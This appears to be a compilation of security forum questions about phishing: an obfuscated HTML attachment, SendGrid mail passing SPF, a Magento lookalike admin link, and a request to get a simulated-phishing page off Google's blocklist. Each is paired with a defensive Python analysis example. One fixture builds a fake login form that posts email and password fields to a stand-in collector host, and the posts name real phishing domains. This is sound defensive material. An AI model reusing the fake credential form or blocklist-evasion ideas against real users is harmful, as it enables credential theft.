Suspected phishing attack – is this obfuscated JavaScript dangerous? [on hold]

I encountered an email from someone with an HTML attachment (the user is somewhat trusted). I clicked on the attachment in Gmail by mistake but immediately closed the new window. On viewing the source code it looks like there’s obfuscated JavaScript code, suggesting something malicious. However, I’m battling to decode it to discover what it’s trying to do. I tried using http://deobfuscatejavascript.com/ which has been somewhat helpful, but some parts I can’t decode. It looks to be trying to replicate Gmail and ask for a username/password, but presumably it would then try to send it somewhere – although I can’t find or decode that part.

I’ve added a paste bin below with the file (it had lots of white space which I’ve since removed):

https://pastebin.com/N0mdsh1g

It seems to be using something called HTML Guardian on parts of it to obfuscate it.

Any help would be appreciated to discover if it really is dangerous or not.

Thanks!
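The part the poster could not locate, where a fake login form submits, can usually be found without running the script at all. The code below is an added example (not from the post or from the pastebin): it assumes the common percent-encoded document.write(unescape('...')) wrapper that HTML Guardian-style tools produce, peels that layer statically, and reports the form action and password fields in the decoded markup. The sample attachment and the collector.example URL are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed stand-in for a suspicious HTML attachment: a fake login form hidden
# behind document.write(unescape('%3C...')), the percent-encoded layer this
# example assumes for HTML Guardian-style output. Nothing here is executed.
FAKE_FORM = (b'<form action="https://collector.example/post.php" method="POST">'
             b'<input name="Email"><input name="Passwd" type="password">'
             b'<input type="submit"></form>')
SAMPLE_ATTACHMENT = ("<html><body><script>document.write(unescape('"
                     + "".join("%%%02X" % b for b in FAKE_FORM)
                     + "'))</script></body></html>")

UNESCAPE_CALL = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
SCRIPT_TAG = re.compile(r"</?script[^>]*>", re.I)
URL_IN_TEXT = re.compile(r"https?://[^\s'\"<>)]+")

def peel_unescape_layers(html: str, max_depth: int = 5) -> str:
    """Percent-decode each unescape('...') call in place, repeating for nested layers."""
    for _ in range(max_depth):
        html, count = UNESCAPE_CALL.subn(lambda m: unquote(m.group(2)), html)
        if count == 0:
            break
    return html

class _FormCollector(HTMLParser):
    """Collects form action URLs and the name/type of every named input."""
    def __init__(self):
        super().__init__()
        self.actions, self.fields = [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.actions.append(a["action"])
        if tag == "input" and a.get("name"):
            self.fields.append((a["name"], a.get("type", "text")))

def extract_exfil_targets(html: str) -> dict:
    """Statically report where a decoded fake-login page would submit credentials."""
    decoded = peel_unescape_layers(html)
    # Markup written via document.write sits inside <script>, which HTMLParser
    # treats as raw text, so strip the script tags before parsing the result.
    p = _FormCollector()
    p.feed(SCRIPT_TAG.sub("", decoded))
    return {"form_actions": p.actions,
            "password_fields": [n for n, t in p.fields if t == "password"],
            "urls": sorted(set(URL_IN_TEXT.findall(decoded)))}
```

Run extract_exfil_targets() over the saved attachment; a form action or URL on a host unrelated to the impersonated service is the exfiltration endpoint to report and block.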

Mindlessly clicked a days-old phishing email link, which appeared dead

Was multitasking and mindlessly clicked a Squarespace phishing email. The page didn’t load, and right away I realized my mistake. Completed several malware scans which came back clean. The button link source was “https://sqwe7.com/”. The domain was registered on Aug 8, I got the email Aug 9, but didn’t click till Aug 11. The domain is no longer active. Did my getting to the email late save my ass? I searched but can’t find any other history on the domain other than it being tagged as phishing Aug 9. Couldn’t find any other links when inspecting the source of the link, unless I am missing something, which is very possible.

Thanks in advance for any advice.

SendGrid emails ignoring SPF records for mass phishing attempts

Recently we have encountered 2 instances of mass phishing attempts from 2 accounts using SendGrid, although the SPF is published as hard fail for both, with no SendGrid records and only the mail servers authorized to send.

To elaborate on the details, we encountered this during the investigation of multiple email incidents. Let’s take two domains, abc.com and def.com – abc.com is on O365 while def.com is on premises (Exchange 2016). Unfortunately, through phishing attacks the malicious attackers were able to compromise 1 account each from both domains and then used these to register on SendGrid (email header analysis shows SendGrid servers sending out the emails). Using this they were able to send out mass phishing emails from SendGrid to external users at Gmail, Yahoo and other corporate domains etc., although the SPF records, published as hardfail, only specified the O365 and on-premises Exchange IPs for the domains respectively.

Quite surprised as to how these emails were able to make it to the inbox of the recipients although there is no SPF, DKIM etc. set up authorizing SendGrid. There is only an SPF record configured, as mentioned earlier, for either O365 or on-premises, which is weird since it’s for both O365 cloud-based and on-premises services, ruling out any cloud-to-cloud integrations etc. between O365 and SendGrid. There seems to be an increase in these types of attacks lately, where a compromised account is used to create an account and have it verified on SendGrid, which is then used for mass mailer (phishing) activities from those domains.

I was wondering if someone could shed some light on this, as there is no DKIM for signing the domains, there is no SPF authorizing SendGrid and it is set to -all (hardfail), but yet with the compromised accounts they are able to send out phishing emails through SendGrid by simply registering with them using the compromised accounts. We tested this out in a lab scenario and were able to replicate this on O365 and on-premises by sending emails to Gmail etc., which were received in the inbox, by registering with SendGrid and with no DNS records authenticating or authorizing SendGrid to send on behalf of the domains.

Many Thanks.
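SPF is evaluated against the envelope sender domain carried in Return-Path (RFC5321.MailFrom), not the visible From: header, so a -all record on the From: domain alone does not stop mail relayed under a third party’s own bounce domain; DMARC is the mechanism that requires the two to align. The check below is an added example, not from the post, using constructed headers with placeholder domains (em.relay-provider.example, mx.receiver.example) and a simplified organizational-domain rule.

```python
from email import message_from_string
from email.utils import parseaddr

# Constructed headers modelled on the case above: the visible From: is the
# victim's domain, but the bounce address in Return-Path (what SPF actually
# evaluates) belongs to the relay, so it is the relay's SPF record that passes.
RELAYED_MSG = """\
Return-Path: <bounces+1234@em.relay-provider.example>
Authentication-Results: mx.receiver.example; spf=pass smtp.mailfrom=em.relay-provider.example
From: "Helpdesk" <helpdesk@abc.com>
To: someone@receiver.example
Subject: Password expiry notice

(body)
"""
# Same message sent through the domain's own server: bounce domain and From:
# domain agree, so the SPF pass is DMARC-aligned.
DIRECT_MSG = RELAYED_MSG.replace("em.relay-provider.example", "abc.com")


def org_domain(host: str) -> str:
    """Organizational domain, simplified to the last two labels (no PSL lookup)."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def spf_dmarc_alignment(raw: str, mode: str = "relaxed") -> dict:
    """Decide whether an SPF pass counts toward DMARC for the From: domain.

    SPF (RFC 7208) authenticates the RFC5321.MailFrom domain carried in
    Return-Path; DMARC (RFC 7489) credits that pass only if it aligns with the
    RFC5322.From domain: exact match in strict mode, same organizational domain
    in relaxed mode. An unaligned pass leaves From: unauthenticated.
    """
    msg = message_from_string(raw)
    from_dom = parseaddr(msg["From"])[1].rpartition("@")[2].lower()
    mailfrom_dom = parseaddr(msg["Return-Path"])[1].rpartition("@")[2].lower()
    spf_pass = "spf=pass" in (msg.get("Authentication-Results") or "")
    if mode == "strict":
        aligned = from_dom == mailfrom_dom
    else:
        aligned = org_domain(from_dom) == org_domain(mailfrom_dom)
    return {"from_domain": from_dom, "mailfrom_domain": mailfrom_dom,
            "spf_pass": spf_pass, "spf_aligned": spf_pass and aligned,
            "dmarc_spf_result": "pass" if spf_pass and aligned else "fail"}
```

With no aligned DKIM signature either, the relayed message fails DMARC; without a published DMARC policy (p=quarantine or p=reject) the receiver has nothing to enforce, which is the gap this scenario exposes.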

Whitelist Simulated phishing landing page

We are running a simulated phishing campaign and one of the landing pages has been blacklisted by Google. If you try to visit it in Chrome you get the big, red warning page “Deceptive site ahead” (it works OK in other browsers).

I assume one of our users reported it, thinking it was a real phishing page (kudos for that!) but now we have the problem that other users who are clicking the links in the emails we send are seeing the warning and not continuing, so we are not collecting data on them, or testing to see if they would go further and enter their credentials. Most importantly, we are missing the opportunity to train users who need that training!

I followed the “report a detection problem” link last week but the domains are still blacklisted. This is my question:

Is there a way to whitelist our landing pages with Google and the other browser makers, so that even though they look like phishing pages, they don’t get blacklisted in the future?

Magento Phishing Attempt

I got a suspicious email today which looked pretty legit and wanted to share it with the community; maybe people who are more security savvy than me can tell me more about this phishing attempt.

Basically it’s an email from a ‘customer’ who says they have put in the wrong address and adds a link to what looks like your own website, which looks like:

[yourwebsite]/order/view/order_id/key/1ee0a069b22ac438e25ad3acbc4a3bcb/

It contains a link to:

https://www.magepanel.info/[yourwebsite]/admin?next=https://[yourwebsite]/order/view/order_id/key/02c9bfb2a970ab62ef8643a47e646064

Does anyone know what type of exploit this is and what it does if you click it?

Thanks!
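Much of what this link is can be read off its structure: the host actually contacted is the third-party one, while the shop’s own name appears only in the path and in the next= parameter, the shape of a lookalike admin page that hands the visitor back to the real site afterwards. The check below is an added example (not the poster’s code), with [yourwebsite] replaced by the placeholder yourwebsite.example and the comparison LEGIT_URL constructed.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed stand-ins for the link quoted above, with "[yourwebsite]" replaced
# by the placeholder yourwebsite.example; the third-party host is as shown in the post.
OWN_DOMAIN = "yourwebsite.example"
SUSPECT_URL = ("https://www.magepanel.info/yourwebsite.example/admin"
               "?next=https://yourwebsite.example/order/view/order_id/key/"
               "02c9bfb2a970ab62ef8643a47e646064")
# A genuine admin link on the shop's own host, for comparison.
LEGIT_URL = "https://yourwebsite.example/admin?next=https://yourwebsite.example/order/view/"


def registrable(host: str) -> str:
    """Registrable domain, simplified to the last two labels (no PSL lookup)."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def assess_link(url: str, own_domain: str) -> dict:
    """Flag a link whose real host differs from the expected site while that
    site's name appears only in the path or a redirect-style parameter."""
    parts = urlsplit(url)
    host = parts.hostname or ""          # the host the browser actually resolves
    own = own_domain.lower()
    # Parameters whose value is itself a URL (e.g. next=) say where the visitor
    # is sent afterwards; record the host of each.
    redirects = {k: urlsplit(v[0]).hostname for k, v in parse_qs(parts.query).items()
                 if v and v[0].lower().startswith(("http://", "https://"))}
    on_own_host = registrable(host) == registrable(own)
    name_in_path = own in parts.path.lower()
    name_in_redirect = any(h and registrable(h) == registrable(own)
                           for h in redirects.values())
    return {"host": host,
            "hosted_on_own_domain": on_own_host,
            "own_domain_in_path": name_in_path,
            "redirect_params": redirects,
            "suspicious": not on_own_host and (name_in_path or name_in_redirect)}
```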